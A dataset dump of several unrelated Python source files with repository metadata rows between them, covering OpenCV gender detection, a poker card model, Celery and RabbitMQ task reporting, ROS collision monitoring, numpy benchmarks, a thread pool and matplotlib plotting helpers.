            if isinstance(self._running[l], PMonitor.Args):
                self._status.write('r [{0}] {1}\n'.format(self._running[l].external_id, l))
            elif isinstance(self._running[l], str):
                self._status.write('r [{0}] {1}\n'.format(self._running[l], l))
            else:
                self._status.write('r {0}\n'.format(l))
        if with_backlog:
            for r in self._backlog:
                self._status.write('b {0} {1} {2} {3}\n'.format(PMonitor.Args.get_call(r.args),
                                                                ' '.join(PMonitor.Args.get_parameters(r.args)),
                                                                ' '.join(PMonitor.Args.get_inputs(r.args)),
                                                                ' '.join(PMonitor.Args.get_outputs(r.args))))
        self._status.truncate()
        self._status.flush()

    def _finalise_step(self, call, code, command, host, output_paths, outputs, typeOnly=False):
        """
        releases host and type resources, updates report, schedules mature steps, handles failure
        """
        with self._mutex:
            self._release_constraint(call, host, typeOnly=typeOnly)
            self._running.pop(command)
            if code == 0:
                self._report.write(command + '\n')
                self._report_and_bind_outputs(outputs, output_paths)
                self._report.flush()
                self._processed += 1
            elif command in self._to_be_cancelled:
                self._cancelled.append(command)
                sys.__stderr__.write('cancelled {0}\n'.format(command))
            else:
                self._failed.append(command)
                sys.__stderr__.write('failed {0}\n'.format(command))
            self._check_for_mature_tasks()
| 45.03125 | 118 | 0.560583 | 7,078 | 0.982373 | 0 | 0 | 0 | 0 | 0 | 0 | 985 | 0.136711 |
3522fc5255a56e1f03bbf963d675fa1aac0e03fb | 2,888 | py | Python | demo/utils/genderdetect.py | TommyZihao/MMGEN-FaceStylor | 05c6539b43fd19955d64eb37c86ee2cd425bcb9d | [
"Apache-2.0"
] | 122 | 2021-12-10T06:19:03.000Z | 2022-03-27T12:30:42.000Z | demo/utils/genderdetect.py | pixel-lt/MMGEN-FaceStylor | a72bb3b1ee6cff50e0edd62e5a823049c3c1cd82 | [
"Apache-2.0"
] | 1 | 2021-12-24T10:07:41.000Z | 2021-12-24T10:07:41.000Z | demo/utils/genderdetect.py | pixel-lt/MMGEN-FaceStylor | a72bb3b1ee6cff50e0edd62e5a823049c3c1cd82 | [
"Apache-2.0"
] | 12 | 2021-12-10T10:38:19.000Z | 2022-02-08T12:54:46.000Z | import random
import cv2
padding = 20
MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
genderList = ['Male', 'Female']
class GenderDetection():
    """Face detection + binary gender classification with OpenCV DNN models.

    ``detect`` returns True for 'Female', False for 'Male', and a random
    boolean when no usable face is found or an error occurs.
    """

    def __init__(self):
        faceProto = 'data/opencv_face_detector.pbtxt'
        faceModel = 'data/opencv_face_detector_uint8.pb'
        genderProto = 'data/gender_deploy.prototxt'
        genderModel = 'data/gender_net.caffemodel'
        # Fallback answers used when no (usable) face is detected.
        self.ans = [True, False]
        self.faceNet = cv2.dnn.readNet(faceModel, faceProto)
        self.genderNet = cv2.dnn.readNet(genderModel, genderProto)

    def highlightFace(self, net, frame, conf_threshold=0.9):
        """Return (annotated copy of *frame*, list of [x1, y1, x2, y2] boxes)."""
        frameOpencvDnn = frame.copy()
        frameHeight = frameOpencvDnn.shape[0]
        frameWidth = frameOpencvDnn.shape[1]
        blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300),
                                     [104, 117, 123], True, False)
        net.setInput(blob)
        detections = net.forward()
        faceBoxes = []
        for i in range(detections.shape[2]):
            confidence = detections[0, 0, i, 2]
            if confidence > conf_threshold:
                # Detections are normalized; scale back to pixel coords.
                x1 = int(detections[0, 0, i, 3] * frameWidth)
                y1 = int(detections[0, 0, i, 4] * frameHeight)
                x2 = int(detections[0, 0, i, 5] * frameWidth)
                y2 = int(detections[0, 0, i, 6] * frameHeight)
                faceBoxes.append([x1, y1, x2, y2])
                cv2.rectangle(frameOpencvDnn, (x1, y1), (x2, y2), (0, 255, 0),
                              int(round(frameHeight / 150)), 8)
        return frameOpencvDnn, faceBoxes

    # opencv
    def detect(self, img):
        """Classify the first usable face in *img*; True means 'Female'."""
        try:
            resultImg, faceBoxes = self.highlightFace(self.faceNet, img)
            if not faceBoxes:
                return self.ans[random.randint(0, 1)]
            for faceBox in faceBoxes:
                # Skip boxes that extend beyond the assumed 1024px frame.
                if (max(faceBox) > 1024):
                    continue
                face = img[max(0, faceBox[1] -
                               padding):min(faceBox[3] +
                                            padding, img.shape[0] - 1),
                           max(0, faceBox[0] -
                               padding):min(faceBox[2] +
                                            padding, img.shape[1] - 1)]
                blob = cv2.dnn.blobFromImage(face,
                                             1.0, (227, 227),
                                             MODEL_MEAN_VALUES,
                                             swapRB=False)
                self.genderNet.setInput(blob)
                genderPreds = self.genderNet.forward()
                gender = genderList[genderPreds[0].argmax()]
                if (gender == 'Female'):
                    return True
                else:
                    return False
            # All detected boxes were skipped; fall back to a coin flip to
            # match the no-face branch (previously returned None here).
            return self.ans[random.randint(0, 1)]
        except Exception:  # isort:skip # noqa
            # Was a bare ``except:``, which also swallowed SystemExit and
            # KeyboardInterrupt; narrowed to Exception.
            return self.ans[random.randint(0, 1)]
| 40.111111 | 78 | 0.498269 | 2,747 | 0.951177 | 0 | 0 | 0 | 0 | 0 | 0 | 176 | 0.060942 |
352346172d80e787c3629f02731d55869cb32f15 | 2,223 | py | Python | main.py | Knysliux001/pocker | d7f6685db8db407b4f93ea330b9568f1dae39b90 | [
"MIT"
] | null | null | null | main.py | Knysliux001/pocker | d7f6685db8db407b4f93ea330b9568f1dae39b90 | [
"MIT"
] | null | null | null | main.py | Knysliux001/pocker | d7f6685db8db407b4f93ea330b9568f1dae39b90 | [
"MIT"
] | null | null | null | # import random
#
# deck = list()
# for suit in ["♦", "♥", "♠", "♣"]:
# for value in ["A", "K", "Q", "J", "10", "9", "8", "7", "6", "5", "4", "3", "2"]:
# deck.append((value, suit))
# r_sample = random.sample(deck, 7)
# print(r_sample)
from enum import Enum, auto, unique
class Suit(Enum):
    """The four playing-card suits, valued by their Unicode glyph."""
    HEARTS = "♥"
    DIAMONDS = "♦"
    CLUBS = "♣"
    SPADES = "♠"
class CardRank(Enum):
    """Card ranks; auto() assigns ascending ints TWO=1 .. AXE=13, so the
    member order defines the comparison order used by Card.

    NOTE(review): "AXE" presumably means "ACE" — name kept for compatibility.
    """
    TWO = auto()
    THREE = auto()
    FOUR = auto()
    FIVE = auto()
    SIX = auto()
    SEVEN = auto()
    EIGHT = auto()
    NINE = auto()
    TEN = auto()
    JACK = auto()
    QUEEN = auto()
    KING = auto()
    AXE = auto()
class HandRank(Enum):
    """Poker hand categories, ordered weakest (HIGHEST_CARD) to strongest
    (ROYAL_FLUSH); auto() values reflect that ordering."""
    HIGHEST_CARD = auto()
    PAIR = auto()
    TWO_PAIRS = auto()
    THREE = auto()
    STRAIGHT = auto()
    FLUSH = auto()
    FULL_HOUSE = auto()
    FOUR = auto()
    STRAIGHT_FLUSH = auto()
    ROYAL_FLUSH = auto()
class Card():
    """A playing card; comparisons use the rank only, suits are ignored."""

    def __init__(self, value, suit):
        # value: a CardRank member; suit: a Suit member.
        self.__value = value
        self.__suit = suit

    def getValue(self):
        """Return the card's rank."""
        return self.__value

    def __str__(self):
        # Was ``pass`` (returned None, which breaks str(card)); render the
        # rank name followed by the suit glyph, e.g. "FIVE♠".
        return f'{self.__value.name}{self.__suit.value}'

    def __eq__(self, card2):
        return self.__value.value == card2.getValue().value

    def __hash__(self):
        # Defining __eq__ alone made cards unhashable; keep the hash
        # aligned with equality (rank only, suit ignored).
        return hash(self.__value.value)

    def __lt__(self, card2):
        return self.__value.value < card2.getValue().value
class Player(Card):
    """A named player holding a hand of cards.

    NOTE(review): inherits Card even though a player is not a card; the
    base class is kept only for backward compatibility.
    """

    def __init__(self, name):
        self.__name = name
        self.__hand = []

    def getName(self):
        """Return the player's name."""
        return self.__name

    def receiveCard(self, new_card):
        """Add *new_card* to the hand, silently ignoring non-Card objects."""
        if isinstance(new_card, Card):
            self.__hand.append(new_card)

    def showHand(self):
        """Print the hand as a list of card objects."""
        print([card for card in self.__hand])
card1 = Card(CardRank.FIVE, Suit.SPADES)
card2 = Card(CardRank.SEVEN, Suit.CLUBS)
card3 = Card(CardRank.AXE, Suit.CLUBS)
card4 = Card(CardRank.FIVE, Suit.SPADES)
card5 = Card(CardRank.SEVEN, Suit.CLUBS)
card6 = Card(CardRank.AXE, Suit.CLUBS)
card7 = Card(CardRank.AXE, Suit.CLUBS)
l = [card1, card2, card3, card4, card5, card6, card7]
print(l)
print(card1 < card3)
| 21.375 | 87 | 0.525416 | 1,511 | 0.674855 | 0 | 0 | 0 | 0 | 0 | 0 | 276 | 0.123269 |
352358117b3813753b8bc8e524aa0139c98a9916 | 1,118 | py | Python | networkapi/api_task/classes.py | vinicius-marinho/GloboNetworkAPI | 94651d3b4dd180769bc40ec966814f3427ccfb5b | [
"Apache-2.0"
] | 73 | 2015-04-13T17:56:11.000Z | 2022-03-24T06:13:07.000Z | networkapi/api_task/classes.py | leopoldomauricio/GloboNetworkAPI | 3b5b2e336d9eb53b2c113977bfe466b23a50aa29 | [
"Apache-2.0"
] | 99 | 2015-04-03T01:04:46.000Z | 2021-10-03T23:24:48.000Z | networkapi/api_task/classes.py | shildenbrand/GloboNetworkAPI | 515d5e961456cee657c08c275faa1b69b7452719 | [
"Apache-2.0"
] | 64 | 2015-08-05T21:26:29.000Z | 2022-03-22T01:06:28.000Z | # -*- coding: utf-8 -*-
from networkapi import celery_app
from networkapi.queue_tools.rabbitmq import QueueManager
from networkapi.usuario.models import Usuario
class BaseTask(celery_app.Task):
    """Celery task base that publishes each task's final status and result
    to a per-user RabbitMQ queue after the task returns."""

    def after_return(self, status, retval, task_id, args, kwargs, einfo):
        # NOTE(review): assumes args[1] is always the user's primary key —
        # every task using this base must follow that convention; confirm.
        user = Usuario.get_by_pk(args[1])
        task = celery_app.AsyncResult(task_id)
        if status == 'FAILURE':
            # Prefer the structured exception message when available.
            if hasattr(task.result, "exc_message"):
                result = task.result.exc_message
            else:
                result = task.result.message
        else:
            result = task.result
        # One queue per user; one routing key per task.
        queue_name = 'tasks.%s' % user.user.lower()
        routing_key = '%s.%s' % (queue_name, task_id)
        queue_manager = QueueManager(broker_vhost='tasks',
                                     queue_name=queue_name,
                                     exchange_name=queue_name,
                                     routing_key=routing_key)
        queue_manager.append({
            'task_id': task_id,
            'status': status,
            'result': result
        })
        queue_manager.send()
| 32.882353 | 73 | 0.560823 | 954 | 0.853309 | 0 | 0 | 0 | 0 | 0 | 0 | 94 | 0.084079 |
35238db428c720694c3ee3ace0a023636d8019be | 539 | py | Python | tests/thalesians/filtering/algs/test_kalman.py | thalesians/bayestsa | d54ea04ffa9903473b11c906545e95b2666afb88 | [
"Apache-2.0"
] | 18 | 2017-03-07T19:13:18.000Z | 2021-01-05T00:35:30.000Z | tests/thalesians/filtering/algs/test_kalman.py | HanMeh/bayestsa | d54ea04ffa9903473b11c906545e95b2666afb88 | [
"Apache-2.0"
] | null | null | null | tests/thalesians/filtering/algs/test_kalman.py | HanMeh/bayestsa | d54ea04ffa9903473b11c906545e95b2666afb88 | [
"Apache-2.0"
] | 14 | 2016-12-27T00:09:40.000Z | 2020-12-27T19:23:53.000Z | import datetime
import unittest
class KalmanFilterTest(unittest.TestCase):
    """Placeholder skeleton for Kalman filter tests."""

    def test_kalman_filter_with_prior_predict(self):
        # NOTE(review): prints a fixed datetime and asserts a tautology;
        # no filter behaviour is actually exercised yet.
        t0 = datetime.datetime(2014, 2, 12, 16, 18, 25, 204000)
        print(t0)
        self.assertEqual(1., 1.)

    def test_kalman_filter_without_prior_predict(self):
        # TODO: implement.
        pass

    def test_kalman_filter_with_low_variance_observation(self):
        # TODO: implement.
        pass

    def test_kalman_filter_multidim(self):
        # TODO: implement.
        pass
if __name__ == '__main__':
unittest.main()
| 23.434783 | 63 | 0.64564 | 445 | 0.825603 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.018553 |
352401392d56cb0110d7577485af9d192f7adefa | 615 | py | Python | fclib/tests/test_dcnn.py | barrosm/forecasting | 86b421b71826b92e47c3e3cb6cdcbf7ff4a63b90 | [
"MIT"
] | 2,276 | 2020-04-07T17:38:30.000Z | 2022-03-30T12:24:55.000Z | fclib/tests/test_dcnn.py | barrosm/forecasting | 86b421b71826b92e47c3e3cb6cdcbf7ff4a63b90 | [
"MIT"
] | 31 | 2020-04-10T21:25:18.000Z | 2022-02-10T01:17:19.000Z | fclib/tests/test_dcnn.py | barrosm/forecasting | 86b421b71826b92e47c3e3cb6cdcbf7ff4a63b90 | [
"MIT"
] | 401 | 2020-04-07T18:52:22.000Z | 2022-03-29T04:26:29.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from fclib.models.dilated_cnn import create_dcnn_model
def test_create_dcnn_model():
mod0 = create_dcnn_model(seq_len=1) # default args
assert mod0 is not None
mod1 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=1, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod1 is not None
mod2 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=2, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod2 is not None
| 30.75 | 119 | 0.720325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 85 | 0.138211 |
352587a10e761446a3e63b0953410077faf0a841 | 1,579 | py | Python | threads/thread_pool_example.py | CoolerVoid/Python_survival_tricks | 10cfa91535b46e3e2bcad32128067c2239fcb13a | [
"BSD-2-Clause"
] | 4 | 2019-08-02T12:21:42.000Z | 2022-03-18T01:59:51.000Z | threads/thread_pool_example.py | CoolerVoid/Python_survival_tricks | 10cfa91535b46e3e2bcad32128067c2239fcb13a | [
"BSD-2-Clause"
] | null | null | null | threads/thread_pool_example.py | CoolerVoid/Python_survival_tricks | 10cfa91535b46e3e2bcad32128067c2239fcb13a | [
"BSD-2-Clause"
] | null | null | null | # threadpool example
import sys
from threading import Thread
import queue
import time
class Worker(Thread):
def __init__(self,queue):
super(Worker, self).__init__()
self._q = queue
self.daemon = True
self.start()
def run(self):
while True:
f,args,kwargs = self._q.get()
try:
if f(*args, **kwargs)!=None:
f(*args, **kwargs)
except Exception as e:
print(e.message)
self._q.task_done()
class ThreadPool(object):
def __init__(self, num_t=max):
self._q = queue.Queue(num_t)
# Create Worker Thread
for _ in range(num_t):
Worker(self._q)
def add_task(self,f,*args,**kwargs):
self._q.put((f, args, kwargs))
def wait_complete(self):
self._q.join()
def teste_call(n):
print("Test number : "+str(n))
time.sleep(3)
if __name__ == '__main__':
# threads ao mesmo tempo rodando no caso 3 ao memso tempo
pool = ThreadPool(6)
var=[]
var.append("opa1")
var.append("opa2")
var.append("opa3")
var.append("opa4")
var.append("opa5")
var.append("opa6")
# quantidade de elementos diferentes
counter=6
# 3 seria para rodar 3 vezes
for _ in range(3):
for tmp in var:
# roda 5 threads por vez, cada vez passando um elemento da lista diferente
if counter!=0:
pool.add_task(teste_call,tmp)
counter-=1
if counter == 0:
counter=6
pool.wait_complete()
time.sleep(1)
print("\nLoop range end\n")
| 23.924242 | 84 | 0.582647 | 711 | 0.450285 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.203293 |
35259f2c996dfec7e43f95678e6a70059dbf5d13 | 2,102 | py | Python | src/CollidingNode.py | kingjin94/enhanced_simulation | 45021f9691e5f772ef4840d69b0d504a6ee79441 | [
"Intel"
] | null | null | null | src/CollidingNode.py | kingjin94/enhanced_simulation | 45021f9691e5f772ef4840d69b0d504a6ee79441 | [
"Intel"
] | null | null | null | src/CollidingNode.py | kingjin94/enhanced_simulation | 45021f9691e5f772ef4840d69b0d504a6ee79441 | [
"Intel"
] | null | null | null | #!/usr/bin/python
import rospy
from gazebo_msgs.msg import ContactsState
from enhanced_sim.msg import CollisionState
"""
Spec:
Look at all /panda/bumper* topics, get which are colliding and
publish a boolean variable (per link) saying whether in collision
"""
class CollidingNode(object):
def __init__(self, collision_state_update_freq = 100):
self.update_rate = rospy.Rate(collision_state_update_freq)
self.pub = rospy.Publisher('/panda/bumper/colliding', CollisionState, queue_size=10)
# find all bumper topics and subscribe
self.observedLinks = [] # List of all links under observance
self.last_collision_times = {} # Last collision time for each link
while "/panda/bumper/panda_probe_ball" not in self.observedLinks:
rospy.sleep(1.0)
rospy.loginfo("Waiting for /panda/bumper/panda_probe_ball")
topics = rospy.get_published_topics()
self.observedLinks = [] # List of all links under observance
self.last_collision_times = {} # Last collision time for each link
for name, msgType in topics:
if msgType == "gazebo_msgs/ContactsState" and "/panda/bumper/panda_" in name:
rospy.Subscriber(name, ContactsState,
callback=self.collision_listener, callback_args=name)
self.observedLinks.append(name)
self.last_collision_times[name] = rospy.get_rostime()
def collision_listener(self, msg, link_name):
if any(msg.states): # atleast one valid collision point
if msg.header.stamp > self.last_collision_times[link_name]:
self.last_collision_times[link_name] = msg.header.stamp
def start(self):
while not rospy.is_shutdown():
# Have less than 10 ms passed since last collision?
msg = CollisionState()
msg.colliding = False
for k, v in self.last_collision_times.items():
if rospy.get_rostime() <= rospy.Duration(1, 10000000) + v:
msg.colliding = True
msg.collidingLinks.append(k)
self.pub.publish(msg)
self.update_rate.sleep() # Wait till next update needs to be sent
if __name__ == '__main__':
rospy.init_node("SimpleCollStateGenerator", anonymous=True)
thisNode = CollidingNode()
thisNode.start()
| 38.218182 | 86 | 0.747383 | 1,702 | 0.809705 | 0 | 0 | 0 | 0 | 0 | 0 | 652 | 0.310181 |
352657d69966e9d784fefcae6daaafdd7408b08d | 2,061 | py | Python | flatlib/protocols/behavior.py | UtkuGlsvn/flatlib | 79ecb961ed77393405bc21a11a5874a62103ceef | [
"MIT"
] | null | null | null | flatlib/protocols/behavior.py | UtkuGlsvn/flatlib | 79ecb961ed77393405bc21a11a5874a62103ceef | [
"MIT"
] | null | null | null | flatlib/protocols/behavior.py | UtkuGlsvn/flatlib | 79ecb961ed77393405bc21a11a5874a62103ceef | [
"MIT"
] | null | null | null | """
This file is part of flatlib - (C) FlatAngle
Author: João Ventura (flatangleweb@gmail.com)
This module implements the Behavior Traditional
Protocol.
"""
from flatlib import const
from flatlib import aspects
from flatlib.dignities import essential
def _merge(listA, listB):
""" Merges two list of objects removing
repetitions.
"""
listA = [x.id for x in listA]
listB = [x.id for x in listB]
listA.extend(listB)
set_ = set(listA)
return list(set_)
def compute(chart):
""" Computes the behavior. """
factors = []
# Planets in House1 or Conjunct Asc
house1 = chart.getHouse(const.HOUSE1)
planetsHouse1 = chart.objects.getObjectsInHouse(house1)
asc = chart.getAngle(const.ASC)
planetsConjAsc = chart.objects.getObjectsAspecting(asc, [0])
_set = _merge(planetsHouse1, planetsConjAsc)
factors.append(['Planets in House1 or Conj Asc', _set])
# Planets conjunct Moon or Mercury
moon = chart.get(const.MOON)
mercury = chart.get(const.MERCURY)
planetsConjMoon = chart.objects.getObjectsAspecting(moon, [0])
planetsConjMercury = chart.objects.getObjectsAspecting(mercury, [0])
_set = _merge(planetsConjMoon, planetsConjMercury)
factors.append(['Planets Conj Moon or Mercury', _set])
# Asc ruler if aspected by disposer
ascRulerID = essential.ruler(asc.sign)
ascRuler = chart.getObject(ascRulerID)
disposerID = essential.ruler(ascRuler.sign)
disposer = chart.getObject(disposerID)
_set = []
if aspects.isAspecting(disposer, ascRuler, const.MAJOR_ASPECTS):
_set = [ascRuler.id]
factors.append(['Asc Ruler if aspected by its disposer', _set]);
# Planets aspecting Moon or Mercury
aspMoon = chart.objects.getObjectsAspecting(moon, [60,90,120,180])
aspMercury = chart.objects.getObjectsAspecting(mercury, [60,90,120,180])
_set = _merge(aspMoon, aspMercury)
factors.append(['Planets Asp Moon or Mercury', _set])
return factors | 29.869565 | 76 | 0.681708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 553 | 0.268186 |
35276376126b8d62c338db73e2e88ec964f2ee31 | 147 | py | Python | fetch_embed/__init__.py | ffreemt/fetch-embed | 95b97806d2becd3606989dd270c90453433b8546 | [
"MIT"
] | null | null | null | fetch_embed/__init__.py | ffreemt/fetch-embed | 95b97806d2becd3606989dd270c90453433b8546 | [
"MIT"
] | null | null | null | fetch_embed/__init__.py | ffreemt/fetch-embed | 95b97806d2becd3606989dd270c90453433b8546 | [
"MIT"
] | null | null | null | __version__ = "0.1.6"
from .fetch_embed import fetch_embed
from .embed_text import embed_text
__all__ = (
"fetch_embed",
"embed_text",
)
| 14.7 | 36 | 0.707483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 32 | 0.217687 |
352a8ae5a17ad0bab619623a2f26962525fde757 | 4,570 | py | Python | NeodymiumDotNet.Benchmark.Numpy/SimpleCalculationBenchmark.py | aka-nd1220/NeodymiumDotNet | cbb105af6835f450767383f3ee505e9e5af50bcc | [
"Apache-2.0"
] | null | null | null | NeodymiumDotNet.Benchmark.Numpy/SimpleCalculationBenchmark.py | aka-nd1220/NeodymiumDotNet | cbb105af6835f450767383f3ee505e9e5af50bcc | [
"Apache-2.0"
] | null | null | null | NeodymiumDotNet.Benchmark.Numpy/SimpleCalculationBenchmark.py | aka-nd1220/NeodymiumDotNet | cbb105af6835f450767383f3ee505e9e5af50bcc | [
"Apache-2.0"
] | 1 | 2021-09-06T07:53:25.000Z | 2021-09-06T07:53:25.000Z | #!/usr/bin/env python3
import numpy as np
import numpy.random as npr
import pytest
A1 = npr.rand( 1, 1)
B1 = npr.rand( 1, 1)
C1 = npr.rand( 1, 1)
A3 = npr.rand( 3, 3)
B3 = npr.rand( 3, 3)
C3 = npr.rand( 3, 3)
A10 = npr.rand( 10, 10)
B10 = npr.rand( 10, 10)
C10 = npr.rand( 10, 10)
A30 = npr.rand( 30, 30)
B30 = npr.rand( 30, 30)
C30 = npr.rand( 30, 30)
A100 = npr.rand( 100, 100)
B100 = npr.rand( 100, 100)
C100 = npr.rand( 100, 100)
A300 = npr.rand( 300, 300)
B300 = npr.rand( 300, 300)
C300 = npr.rand( 300, 300)
A1000 = npr.rand(1000, 1000)
B1000 = npr.rand(1000, 1000)
C1000 = npr.rand(1000, 1000)
A3000 = npr.rand(3000, 3000)
B3000 = npr.rand(3000, 3000)
C3000 = npr.rand(3000, 3000)
NC_A1 = list(A1 .flatten())
NC_B1 = list(B1 .flatten())
NC_C1 = list(C1 .flatten())
NC_A3 = list(A3 .flatten())
NC_B3 = list(B3 .flatten())
NC_C3 = list(C3 .flatten())
NC_A10 = list(A10 .flatten())
NC_B10 = list(B10 .flatten())
NC_C10 = list(C10 .flatten())
NC_A30 = list(A30 .flatten())
NC_B30 = list(B30 .flatten())
NC_C30 = list(C30 .flatten())
NC_A100 = list(A100 .flatten())
NC_B100 = list(B100 .flatten())
NC_C100 = list(C100 .flatten())
NC_A300 = list(A300 .flatten())
NC_B300 = list(B300 .flatten())
NC_C300 = list(C300 .flatten())
NC_A1000 = list(A1000.flatten())
NC_B1000 = list(B1000.flatten())
NC_C1000 = list(C1000.flatten())
NC_A3000 = list(A3000.flatten())
NC_B3000 = list(B3000.flatten())
NC_C3000 = list(C3000.flatten())
def add_numpy_core(a: np.ndarray, b: np.ndarray, c: np.ndarray) -> np.ndarray:
return a + b + c
def add_simple_core(a: list, b: list, c: list) -> list:
retval = [0.0] * len(a)
for i in range(len(a)):
retval[i] = a[i] + b[i] + c[i]
return retval
def add_numpy_1 (): return add_numpy_core(A1 , B1 , C1 )
def add_numpy_3 (): return add_numpy_core(A3 , B3 , C3 )
def add_numpy_10 (): return add_numpy_core(A10 , B10 , C10 )
def add_numpy_30 (): return add_numpy_core(A30 , B30 , C30 )
def add_numpy_100 (): return add_numpy_core(A100 , B100 , C100 )
def add_numpy_300 (): return add_numpy_core(A300 , B300 , C300 )
def add_numpy_1000(): return add_numpy_core(A1000, B1000, C1000)
def add_numpy_3000(): return add_numpy_core(A3000, B3000, C3000)
def add_simple_1 (): return add_simple_core(A1 , B1 , C1 )
def add_simple_3 (): return add_simple_core(A3 , B3 , C3 )
def add_simple_10 (): return add_simple_core(A10 , B10 , C10 )
def add_simple_30 (): return add_simple_core(A30 , B30 , C30 )
def add_simple_100 (): return add_simple_core(A100 , B100 , C100 )
def add_simple_300 (): return add_simple_core(A300 , B300 , C300 )
def add_simple_1000(): return add_simple_core(A1000, B1000, C1000)
def add_simple_3000(): return add_simple_core(A3000, B3000, C3000)
def test_add_numpy_1 (benchmark): benchmark.pedantic(add_numpy_1 , rounds=256, iterations=16)
def test_add_numpy_3 (benchmark): benchmark.pedantic(add_numpy_3 , rounds=256, iterations=16)
def test_add_numpy_10 (benchmark): benchmark.pedantic(add_numpy_10 , rounds=256, iterations=16)
def test_add_numpy_30 (benchmark): benchmark.pedantic(add_numpy_30 , rounds=256, iterations=16)
def test_add_numpy_100 (benchmark): benchmark.pedantic(add_numpy_100 , rounds=256, iterations=16)
def test_add_numpy_300 (benchmark): benchmark.pedantic(add_numpy_300 , rounds=256, iterations=16)
def test_add_numpy_1000 (benchmark): benchmark.pedantic(add_numpy_1000 , rounds=256, iterations=16)
def test_add_numpy_3000 (benchmark): benchmark.pedantic(add_numpy_3000 , rounds=256, iterations=16)
def test_add_simple_1 (benchmark): benchmark.pedantic(add_simple_1 , rounds=256, iterations=16)
def test_add_simple_3 (benchmark): benchmark.pedantic(add_simple_3 , rounds=256, iterations=16)
def test_add_simple_10 (benchmark): benchmark.pedantic(add_simple_10 , rounds=256, iterations=16)
def test_add_simple_30 (benchmark): benchmark.pedantic(add_simple_30 , rounds=256, iterations=16)
def test_add_simple_100 (benchmark): benchmark.pedantic(add_simple_100 , rounds=256, iterations=16)
def test_add_simple_300 (benchmark): benchmark.pedantic(add_simple_300 , rounds=256, iterations=16)
def test_add_simple_1000(benchmark): benchmark.pedantic(add_simple_1000, rounds=256, iterations=16)
def test_add_simple_3000(benchmark): benchmark.pedantic(add_simple_3000, rounds=256, iterations=16)
if __name__ == "__main__":
pytest.main(['-v', __file__])
| 42.71028 | 99 | 0.695842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.007877 |
352ab043ccc828a575977f5e6c14834db88b7602 | 51,242 | py | Python | backstaff/plotting.py | lars-frogner/bifrost-rust | ae1b4e7adde92ec1c611259796ef593243f82a8d | [
"Apache-2.0"
] | null | null | null | backstaff/plotting.py | lars-frogner/bifrost-rust | ae1b4e7adde92ec1c611259796ef593243f82a8d | [
"Apache-2.0"
] | 1 | 2019-10-24T07:24:05.000Z | 2019-10-24T07:24:05.000Z | backstaff/plotting.py | lars-frogner/BifRust | ae1b4e7adde92ec1c611259796ef593243f82a8d | [
"Apache-2.0"
] | null | null | null | import copy
import numpy as np
import matplotlib as mpl
# mpl.use('agg')
import matplotlib.pyplot as plt
import matplotlib.patches as mpl_patches
import matplotlib.colors as mpl_colors
import matplotlib.cm as mpl_cm
import matplotlib.animation as animation
import matplotlib.patheffects as path_effects
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d.art3d import Line3DCollection
from mpl_toolkits.axes_grid1 import make_axes_locatable
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from matplotlib.offsetbox import AnchoredText
def create_figure(width=6.0, aspect_ratio=4.0 / 3.0, dpi=300, **kwargs):
    """Create a matplotlib figure sized by width and aspect ratio.

    An explicit ``figsize`` in ``kwargs`` overrides the computed size.
    """
    figsize = kwargs.pop("figsize", (width, width / aspect_ratio))
    return plt.figure(figsize=figsize, dpi=dpi, **kwargs)
def create_2d_subplots(width=6.0, aspect_ratio=4.0 / 3.0, dpi=300, **kwargs):
    """Create a figure with 2D subplots; returns ``(fig, ax)`` from ``plt.subplots``.

    An explicit ``figsize`` in ``kwargs`` overrides the computed size.
    """
    figsize = kwargs.pop("figsize", (width, width / aspect_ratio))
    return plt.subplots(figsize=figsize, dpi=dpi, **kwargs)
def set_2d_plot_extent(ax, x_lims, y_lims):
    """Apply x/y axis limits to a 2D axes, skipping limits given as None."""
    for apply_lims, lims in ((ax.set_xlim, x_lims), (ax.set_ylim, y_lims)):
        if lims is not None:
            apply_lims(*lims)
def create_3d_plot(width=6.0, aspect_ratio=4.0 / 3.0, dpi=200, **kwargs):
    """Create a figure with a single 3D axes; returns ``(fig, ax)``."""
    figsize = kwargs.pop("figsize", (width, width / aspect_ratio))
    fig = plt.figure(figsize=figsize, dpi=dpi, **kwargs)
    return fig, fig.add_subplot(111, projection="3d")
def set_3d_plot_extent(ax, x_lims, y_lims, z_lims, axes_equal=True):
    """Apply x/y/z axis limits to a 3D axes, optionally equalizing the scales.

    Limits given as None are left unchanged.
    """
    for apply_lims, lims in (
        (ax.set_xlim, x_lims),
        (ax.set_ylim, y_lims),
        (ax.set_zlim, z_lims),
    ):
        if lims is not None:
            apply_lims(*lims)
    if axes_equal:
        set_3d_axes_equal(ax)
def set_3d_axes_equal(ax):
    """Force equal scaling on all three axes of a 3D plot.

    Expands every axis to the largest half-span around its midpoint and
    sets a cubic box aspect so one data unit looks the same along x, y, z.
    """
    bounds = np.array([ax.get_xlim3d(), ax.get_ylim3d(), ax.get_zlim3d()])
    center = np.mean(bounds, axis=1)
    half_span = 0.5 * np.abs(bounds[:, 1] - bounds[:, 0]).max()
    ax.set_xlim3d([center[0] - half_span, center[0] + half_span])
    ax.set_ylim3d([center[1] - half_span, center[1] + half_span])
    ax.set_zlim3d([center[2] - half_span, center[2] + half_span])
    ax.set_box_aspect([2 * half_span] * 3)
def set_2d_axis_labels(ax, xlabel, ylabel, xcolor="k", ycolor="k"):
    """Label the x- and y-axes of a 2D plot, each with its own color."""
    ax.set_ylabel(ylabel, color=ycolor)
    ax.set_xlabel(xlabel, color=xcolor)
def set_3d_axis_labels(ax, xlabel, ylabel, zlabel):
    """Label all three axes of a 3D plot."""
    for apply_label, text in (
        (ax.set_xlabel, xlabel),
        (ax.set_ylabel, ylabel),
